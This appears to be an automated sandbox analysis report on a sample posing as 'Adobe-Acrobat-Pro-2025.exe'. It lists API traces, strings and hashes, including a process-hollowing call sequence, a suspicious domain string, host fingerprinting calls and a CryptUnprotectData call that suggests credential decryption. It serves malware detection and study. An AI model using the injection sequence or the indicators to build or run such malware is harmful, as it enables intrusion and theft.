Show Windows behavior

Target ID:	5
Start time:	10:14:21
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 908
Imagebase:	0xe0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	20.5%
Total number of Nodes:	39
Total number of Limit Nodes:	4

Executed Functions

Function 02537FDD Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02537F4F,02537F3F), ref: 02538175
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02538188
Wow64GetThreadContext.KERNEL32(00000380,00000000), ref: 025381A6
ReadProcessMemory.KERNELBASE(00000384,?,02537F93,00000004,00000000), ref: 025381CA
VirtualAllocEx.KERNELBASE(00000384,?,?,00003000,00000040), ref: 025381F5
WriteProcessMemory.KERNELBASE(00000384,00000000,?,?,00000000,?), ref: 0253824D
WriteProcessMemory.KERNELBASE(00000384,00400000,?,?,00000000,?,00000028), ref: 02538298
WriteProcessMemory.KERNELBASE(00000384,?,?,00000004,00000000), ref: 025382D6
Wow64SetThreadContext.KERNEL32(00000380,02320000), ref: 02538312
ResumeThread.KERNELBASE(00000380), ref: 02538321

Strings

CreateProcessW, xrefs: 02538091
GetP, xrefs: 0253805F
aryA, xrefs: 02538023
GetThreadContext, xrefs: 025380B7
VirtualAlloc, xrefs: 025380A4
SetThreadContext, xrefs: 02538103
WriteProcessMemory, xrefs: 025380F0
VirtualAllocEx, xrefs: 025380DD
Load, xrefs: 0253801B
ReadProcessMemory, xrefs: 025380CA
TerminateProcess, xrefs: 02538204
ResumeThread, xrefs: 02538119
ress, xrefs: 02538067

Memory Dump Source

Source File: 00000000.00000002.2332294960.0000000002537000.00000040.00000800.00020000.00000000.sdmp, Offset: 02537000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2537000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-232383841
Opcode ID: fb7b6201eaedee4635523f204421a04f1d545bd862ac4ba91bf339366d457fff
Instruction ID: f82c8e1bb2dd203c73ad715a455a8bd3dae8dbe5b948da1e2d6bfa29b5af938d
Opcode Fuzzy Hash: fb7b6201eaedee4635523f204421a04f1d545bd862ac4ba91bf339366d457fff
Instruction Fuzzy Hash: D9B1F67660064AAFDB60CF68CC80BDAB7A5FF88714F158524FA08AB341D774FA51CB94

Function 0253815A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02537F4F,02537F3F), ref: 02538175
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02538188
Wow64GetThreadContext.KERNEL32(00000380,00000000), ref: 025381A6
ReadProcessMemory.KERNELBASE(00000384,?,02537F93,00000004,00000000), ref: 025381CA
VirtualAllocEx.KERNELBASE(00000384,?,?,00003000,00000040), ref: 025381F5
WriteProcessMemory.KERNELBASE(00000384,00000000,?,?,00000000,?), ref: 0253824D
WriteProcessMemory.KERNELBASE(00000384,00400000,?,?,00000000,?,00000028), ref: 02538298
WriteProcessMemory.KERNELBASE(00000384,?,?,00000004,00000000), ref: 025382D6
Wow64SetThreadContext.KERNEL32(00000380,02320000), ref: 02538312
ResumeThread.KERNELBASE(00000380), ref: 02538321

Strings

TerminateProcess, xrefs: 02538204

Memory Dump Source

Source File: 00000000.00000002.2332294960.0000000002537000.00000040.00000800.00020000.00000000.sdmp, Offset: 02537000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2537000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: TerminateProcess
API String ID: 2687962208-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: 991c02f0729347bee0004020798b9ea52fba237398558a38d50d88edc1613b3b
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: 6031FD72240646ABDB75CF94CC91FEA7365BFC8B15F148509FB09AF280C6B4BA018B94

Function 008C2880 Relevance: 1.7, APIs: 1, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2331870248.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 496aea880d0557637db61d1bce92527ea554ff95646cc7bad269cb55b43ffe0c
Instruction ID: 677ddabce08e24803d0824d1017f8c41f578ebcb5c618fc802e26cc22333988e
Opcode Fuzzy Hash: 496aea880d0557637db61d1bce92527ea554ff95646cc7bad269cb55b43ffe0c
Instruction Fuzzy Hash: 6BA1F371A002699FCB15DFA9D590AADFBF1FF48314F28C659E459E7252C330A881CBA4

Function 008C2104 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 008C2B49

Memory Dump Source

Source File: 00000000.00000002.2331870248.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 90a1bec93cf55e6399b9a98adee76506379d723e01a685ad915878caf8ae8636
Instruction ID: a1935fdb168ee2f03d4a777d716105258eb75973c70968774c8a4d51e45ef6b9
Opcode Fuzzy Hash: 90a1bec93cf55e6399b9a98adee76506379d723e01a685ad915878caf8ae8636
Instruction Fuzzy Hash: A321E5B5D0061D9FCB00CF99C884BDEFBB4FB48320F10816AE518A7340C374A954CBA1

Analysis Process: Adobe-Acrobat-Pro-2025.exePID: 2316, Parent PID: 5768COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	63.7%
Total number of Nodes:	237
Total number of Limit Nodes:	15

Executed Functions

Function 004116D0 Relevance: 187.5, APIs: 4, Strings: 102, Instructions: 1951COMMON

Download Yara Rule

Strings

R, xrefs: 00411BB3
J, xrefs: 00411907
~, xrefs: 00412426
t, xrefs: 00411FDB
], xrefs: 004122CE
K, xrefs: 00412BFB
L, xrefs: 00413066
\, xrefs: 004122C9
h, xrefs: 00412CDB
9, xrefs: 00412D53
h, xrefs: 00412989
}, xrefs: 0041241E
Z, xrefs: 00412C9B
t, xrefs: 00412C4B
J, xrefs: 00413036
|, xrefs: 00412C2B
{, xrefs: 00412BEB
E, xrefs: 0041201B
<, xrefs: 004125D2
d, xrefs: 00412999
P, xrefs: 00412F86
G, xrefs: 004125A0
c, xrefs: 004122C4
&, xrefs: 0041308E
a, xrefs: 00412CAB
7, xrefs: 00412D43
X, xrefs: 00412FC6
D, xrefs: 0041316C
U, xrefs: 00412D4B
:, xrefs: 00411C99
=, xrefs: 004125DA
F, xrefs: 00413016
%, xrefs: 004129C9
U, xrefs: 00412CEB
^, xrefs: 00412CFB
B, xrefs: 00412FF6
T, xrefs: 00412FA6
e, xrefs: 00412C8B
R, xrefs: 00411FEB
j, xrefs: 004119C9
\, xrefs: 00412D7B
h, xrefs: 00412F46
~, xrefs: 00411828
D(, xrefs: 004121D1
;, xrefs: 00412D63
N, xrefs: 00413056
D(, xrefs: 004121CA
=, xrefs: 00411E43
0, xrefs: 004125B2
>, xrefs: 004125C2
3, xrefs: 00412D23
H, xrefs: 00413046
-, xrefs: 00412803
v, xrefs: 00412C5B
`, xrefs: 00412660
", xrefs: 004129D9
q, xrefs: 004123FE
e, xrefs: 00412CBB
!, xrefs: 00412D93
, xrefs: 00412D8B
0, xrefs: 00412FEE
w, xrefs: 004123EE
N, xrefs: 0041223E
A, xrefs: 00412C1B
V, xrefs: 00412D3B
D, xrefs: 00413410
E, xrefs: 00412BDB
B, xrefs: 00412C0B
q, xrefs: 00412979
?, xrefs: 00412D83
V, xrefs: 00412F96
, xrefs: 0041309E
s, xrefs: 0041240E
G, xrefs: 00411FCB
=, xrefs: 00412D73
S, xrefs: 00411731
$, xrefs: 00411892
\, xrefs: 00412FE6
@, xrefs: 00413006
5, xrefs: 00412D33
`, xrefs: 004129B9
s, xrefs: 00412C3B
l, xrefs: 00412F66
1, xrefs: 00412D13
O, xrefs: 00411A60
n, xrefs: 004129A9
N, xrefs: 004125CA
?, xrefs: 00412FDE
U, xrefs: 00411FFB
Z, xrefs: 00412FB6
x, xrefs: 00412BCB
^, xrefs: 00412FD6
\, xrefs: 00412D6B
D, xrefs: 00413026
:, xrefs: 004125E2
R, xrefs: 00412F76
2, xrefs: 004125A5
L, xrefs: 00412248
n, xrefs: 00412F56
+, xrefs: 0041303E
", xrefs: 004121A3
O, xrefs: 00412243

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: $ $!$"$"$$$%$&$+$-$0$0$1$2$3$5$7$9$:$:$;$<$=$=$=$>$?$?$@$A$B$B$D$D$D$D($D($E$E$F$G$G$H$J$J$K$L$L$N$N$N$O$O$P$R$R$R$S$T$U$U$U$V$V$X$Z$Z$\$\$\$\$]$^$^$`$`$a$c$d$e$e$h$h$h$j$l$n$n$q$q$s$s$t$t$v$w$x${$|$}$~$~
API String ID: 0-408446246
Opcode ID: a9306d60808fe83fab81dd2cdba05c0077b3343766f2a3ec6a77f0a3e7c2a848
Instruction ID: a8886452a47edf79823551afa539df5ba94be3d3c34b894cd3579618ddbad710
Opcode Fuzzy Hash: a9306d60808fe83fab81dd2cdba05c0077b3343766f2a3ec6a77f0a3e7c2a848
Instruction Fuzzy Hash: D703B17150C7C18AD3249F3884843DFBBD2ABD6324F188A6EE5E9873D2D6788586C717

Function 00435660 Relevance: 40.4, APIs: 6, Strings: 17, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004356A0
GetSystemMetrics.USER32 ref: 004356B0
DeleteObject.GDI32 ref: 004356F3
SelectObject.GDI32 ref: 00435743
SelectObject.GDI32 ref: 0043579A
DeleteObject.GDI32 ref: 004357C8

Strings

Z^C, xrefs: 004358AD
6aC, xrefs: 00435855
Z^C, xrefs: 0043583F
]C, xrefs: 00435829
Z^C, xrefs: 004358C3
Z^C, xrefs: 004358E4
Z^C, xrefs: 004358EF
Z^C, xrefs: 004358B8
Z^C, xrefs: 00435881
<]C, xrefs: 004358D9
Z^C, xrefs: 0043584A
Z^C, xrefs: 00435834
Z^C, xrefs: 004358FA
Z^C, xrefs: 00435876
m^C, xrefs: 0043588C
, xrefs: 00435771
Z^C, xrefs: 0043586B

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID: $6aC$<]C$Z^C$Z^C$Z^C$Z^C$Z^C$Z^C$Z^C$Z^C$Z^C$Z^C$Z^C$Z^C$m^C$]C
API String ID: 3911056724-986530472
Opcode ID: 91f606716613d9aef6a23ade2718b4493893ec54d2fd047fe162a29b4b9c6ea4
Instruction ID: 4d7aa2d6fc94f71668623475e961cbff8d9fe7e3ed22a0def8d5515ec79ce1a7
Opcode Fuzzy Hash: 91f606716613d9aef6a23ade2718b4493893ec54d2fd047fe162a29b4b9c6ea4
Instruction Fuzzy Hash: 018161B0409384CFE760EF69D98978FBBE0BB85308F11891ED6C84B251DBB95548DF4A

Function 0043A7A0 Relevance: 28.8, APIs: 11, Strings: 5, Instructions: 841
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(888B8A85,00000000,00000001,888B8A78,00000000), ref: 0043AB43
SysAllocString.OLEAUT32(539D5182), ref: 0043ABD3
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043AC14
SysAllocString.OLEAUT32(ED1DF31D), ref: 0043AC5B
SysAllocString.OLEAUT32(87438537), ref: 0043ACF5
VariantInit.OLEAUT32(?), ref: 0043AD65

Strings

745:, xrefs: 0043B14C
$%, xrefs: 0043AB79
5N, xrefs: 0043A991
TU, xrefs: 0043ACC3
QS, xrefs: 0043ACBB

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: $%$5N$745:$TU$QS
API String ID: 65563702-5161006
Opcode ID: 7c1c5f3368b06f0636594e0e1355c55473d0d9d4e7be2ff78567b91e5259adb9
Instruction ID: e058b2abc0ef4107843a287a149306e1b7fc140e11714e3ee257cbccd9c3bde0
Opcode Fuzzy Hash: 7c1c5f3368b06f0636594e0e1355c55473d0d9d4e7be2ff78567b91e5259adb9
Instruction Fuzzy Hash: 7D52D076A483519BD314CF28C88179BFBE1EBC9314F19992DE9D88B381D738D805CB96

Function 00424050 Relevance: 21.5, APIs: 2, Strings: 10, Instructions: 540
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00424115
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004241AB

Strings

:@&F, xrefs: 004243A9
?P:V, xrefs: 004243C9
_Y, xrefs: 00424593
,X*^, xrefs: 004243B9
%\)R, xrefs: 004243C1
1D6Z, xrefs: 004243B1
(EB, xrefs: 004241CC
mj, xrefs: 0042470F
>NoL, xrefs: 004246C7
S], xrefs: 0042458B

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: %\)R$(EB$,X*^$1D6Z$:@&F$>NoL$?P:V$mj$S]$_Y
API String ID: 237503144-869444673
Opcode ID: 7d24abcf619c5be440e7ef120f425731a708752a72317c19358b4b4996e40e02
Instruction ID: 79c578d202be2570158d77d11ce5295a2b3a06aa72d4eb35e57fb24aa22b0339
Opcode Fuzzy Hash: 7d24abcf619c5be440e7ef120f425731a708752a72317c19358b4b4996e40e02
Instruction Fuzzy Hash: 8B02FEB46083508BD300DF65E88162BBBE1FBC6704F44896DF9C69B390D7789946CB9B

Function 0040D4F2 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040D4FE

Strings

A\]R, xrefs: 0040D81A
sobrattyeu.bond, xrefs: 0040D8E7
DZ, xrefs: 0040D804
", xrefs: 0040D5D5
/, xrefs: 0040D513
dz, xrefs: 0040D7AC

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: Uninitialize
String ID: "$/$A\]R$sobrattyeu.bond$DZ$dz
API String ID: 3861434553-2952508988
Opcode ID: f47be2eb097691b9fbef27c08049728131315453ca6fde43d8e6a86a4bb4e28e
Instruction ID: cc43c64cefa3df384ea12d4ae08cf9305f9ad1b70fe97b04b8d7f3693f6349cd
Opcode Fuzzy Hash: f47be2eb097691b9fbef27c08049728131315453ca6fde43d8e6a86a4bb4e28e
Instruction Fuzzy Hash: C6A1E2B190D3C18BD3318F69C5943ABBBE1ABE2304F19496DC4C95B382D7794509CB9B

Function 004204E0 Relevance: 9.2, Strings: 7, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!@, xrefs: 00420513
q, xrefs: 00420747
t, xrefs: 00420756
;, xrefs: 004206B9
,, xrefs: 0042096D
u, xrefs: 0042075B
s, xrefs: 00420751

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$;$q$s$t$u
API String ID: 1279760036-4185753356
Opcode ID: 8cf850537eea56542c4b21b6d880cb052dc195442939828400c38c2c4102f2cb
Instruction ID: fbfa7247e5a5a965cd0d34f9d9eff214f143c6f8502ca6a5d41ab00f858c6161
Opcode Fuzzy Hash: 8cf850537eea56542c4b21b6d880cb052dc195442939828400c38c2c4102f2cb
Instruction Fuzzy Hash: 3702CD7060C3508FD3249F28D09436FBBE1AB95314F948A2EE5D9873D2D7B99885CB4B

Function 00409460 Relevance: 9.1, Strings: 7, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

68>6, xrefs: 00409595
x~, xrefs: 004096DB
0915015DAA6168FC82571D99A8EB0A98, xrefs: 00409524
S#PZ, xrefs: 0040951E, 00409529, 0040956E, 004095A9, 00409644, 004096C9
/,, xrefs: 00409783
0, xrefs: 004095CC
z{, xrefs: 00409833

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: /,$0$0915015DAA6168FC82571D99A8EB0A98$68>6$S#PZ$z{$x~
API String ID: 0-3063654457
Opcode ID: 044a9fbe8afe8c913a4f3cd88e9e78f0f2708bbf253fce4dffd61ad28fbc1347
Instruction ID: 6402db47f467e830910ba8fd2d759c69e224be21b7db5969f087c203c71441cb
Opcode Fuzzy Hash: 044a9fbe8afe8c913a4f3cd88e9e78f0f2708bbf253fce4dffd61ad28fbc1347
Instruction Fuzzy Hash: DBB1017160C3809BD718CF25C8516ABBBE2EFD2314F18892DF5D597382D639C90ACB5A

Function 004084E0 Relevance: 7.8, APIs: 5, Instructions: 258
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408504
GetCurrentThreadId.KERNEL32 ref: 0040850E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004085DF
GetForegroundWindow.USER32 ref: 00408606
ExitProcess.KERNEL32 ref: 004087F7

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: f80621cca1b479859d8d5869f2d1a060809b4e05f62f0aad40815e698ae86817
Instruction ID: cea05c45b477ecfbbe9d599816af6b95190e6aafeb46eef73f207e1fe64658cb
Opcode Fuzzy Hash: f80621cca1b479859d8d5869f2d1a060809b4e05f62f0aad40815e698ae86817
Instruction Fuzzy Hash: F8716D73B043144BC718AFB98D8276AB6C66784314F1E443EE985EB3D6EDB8DC058685

Function 0042EBAA Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 369
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

n[_F, xrefs: 0042EF1C
`pj2, xrefs: 0042F037

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: `pj2$n[_F
API String ID: 0-1568922636
Opcode ID: 1ff278be486d2074aa95d0b25b0dbd7e7a05a4518fc69698d74eb86cf2a7941d
Instruction ID: c679787e269ecf6d8c547f6ad77f312bced68018bc0ba4564c2098b3b738b833
Opcode Fuzzy Hash: 1ff278be486d2074aa95d0b25b0dbd7e7a05a4518fc69698d74eb86cf2a7941d
Instruction Fuzzy Hash: 6AB105706047918FD7298F39C490722BBE1EF5B304F6885AEC4D68F792D73A9806CB55

Function 0042EEF7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EFDD

Strings

n[_F, xrefs: 0042EF1C
`pj2, xrefs: 0042F037

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: `pj2$n[_F
API String ID: 3960555810-1568922636
Opcode ID: ccdc7723517d5e150c007b9b8a4d79aab53b3597a50cd556653767c20468eb68
Instruction ID: de8741b89e839fb26d4d890d9d3432ea25f81fe8349c62e99775040e196e7cfc
Opcode Fuzzy Hash: ccdc7723517d5e150c007b9b8a4d79aab53b3597a50cd556653767c20468eb68
Instruction Fuzzy Hash: 569126706083918BD7298F39C490722BBF1AF5B304F5881AEC0D68F793D73A9806CB19

Function 0042D8B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042D8D3
GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042D950

Strings

9, xrefs: 0042D8FB

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: 9
API String ID: 2904949787-1434092063
Opcode ID: 5be8d0869b3eb6187040496b4f7c8b6db19e382ff48eb2d8ac01a4a8aa401c93
Instruction ID: d0e3e9a6f9fd33ea0c1404a9928dd807114c825419f024f2cf95efb58dcd4108
Opcode Fuzzy Hash: 5be8d0869b3eb6187040496b4f7c8b6db19e382ff48eb2d8ac01a4a8aa401c93
Instruction Fuzzy Hash: AB21AF745006928FEB168F29D850276BFF0EF17314F2845AAE0D69B6A2C734A859CB64

Function 0042D8AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042D8D3
GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042D950

Strings

9, xrefs: 0042D8FB

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: 9
API String ID: 2904949787-1434092063
Opcode ID: a05206aaf3bda7284b38c0d0c5dc9d4c39f1bb99de0fd8c6302f8678c74d8ae9
Instruction ID: ce62d1e64f7c23278b5fb11930b51f75ffc0831e265315f8352866ce27da3fda
Opcode Fuzzy Hash: a05206aaf3bda7284b38c0d0c5dc9d4c39f1bb99de0fd8c6302f8678c74d8ae9
Instruction Fuzzy Hash: 2811A0B45002828FD7159F25D850626FBF1EF0B310B645969E0D6DB6A1C734E895CB54

Function 0041DF60 Relevance: 4.5, Strings: 3, Instructions: 731COMMON

Download Yara Rule

Strings

BA, xrefs: 0041E865
A, xrefs: 0041E79D
iA, xrefs: 0041E95B

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: BA$iA$A
API String ID: 0-1286867181
Opcode ID: e28334422286b8df8f9021d3eead2627fee74cb098c93f3be15d139c004570d4
Instruction ID: 582e521f05730b710efa4fc11b09fcd85b7afc0739262b6ffee548978c7ea6be
Opcode Fuzzy Hash: e28334422286b8df8f9021d3eead2627fee74cb098c93f3be15d139c004570d4
Instruction Fuzzy Hash: 96725FB0609B808FD329CF3CC815797BFD5AB5A314F088A5DE0EE87392C77965058B66

Function 0042D847 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042D950

Strings

9, xrefs: 0042D8FB

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: ComputerName
String ID: 9
API String ID: 3545744682-1434092063
Opcode ID: 08f9bb8b1ebc98a7838556bcf147000e367356ba76797d28b1855a6a006fda31
Instruction ID: 2ca32a3ad1e9e602ef75f806ec89e824b8b80f08eab23e4f899dba53ec5eddf3
Opcode Fuzzy Hash: 08f9bb8b1ebc98a7838556bcf147000e367356ba76797d28b1855a6a006fda31
Instruction Fuzzy Hash: DD1104B45002828FE7119F35D850623FBF0EB17310F64556AD0E6EB691C334E881CB54

Function 0040DE81 Relevance: 2.7, Strings: 2, Instructions: 175COMMON

Download Yara Rule

Strings

0915015DAA6168FC82571D99A8EB0A98, xrefs: 0040DFBC
0, xrefs: 0040DE8B

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: 0$0915015DAA6168FC82571D99A8EB0A98
API String ID: 0-3533001242
Opcode ID: e0ba77d798e377eb0e3b48965f2e93d837289d31db47b71f0c7a60225cd210f9
Instruction ID: 386e51b47c0eb25b3ca6aa8fa17153b05188522e91f6208d394294653f68aa6b
Opcode Fuzzy Hash: e0ba77d798e377eb0e3b48965f2e93d837289d31db47b71f0c7a60225cd210f9
Instruction Fuzzy Hash: B75146B6A1839147C324CF29CC957ABBBE39FC5308F18CA3DD4D997297EA7844058786

Function 00409921 Relevance: 2.6, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

mX[, xrefs: 00409B0A
mbkh, xrefs: 0040999B, 00409A02

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: mX[$mbkh
API String ID: 0-729929653
Opcode ID: 4fb0364ca224016dd24aa37ff1e179f2433f7ae5c322bab380184341a9e3ec62
Instruction ID: dfce68015761a0a2020785859186186e69d3627996b313fbccc46d7605ae094f
Opcode Fuzzy Hash: 4fb0364ca224016dd24aa37ff1e179f2433f7ae5c322bab380184341a9e3ec62
Instruction Fuzzy Hash: 1F412476A453688FCB24CFA98C846D9BB61BB86304F1982ACC8497B701C7380E49CFC4

Function 00414F9B Relevance: 1.7, APIs: 1, Instructions: 249encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041514B

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 5703d509ee64a993b938a3a05769140ebe37c5336f6eb0dfea2804d93bfa396e
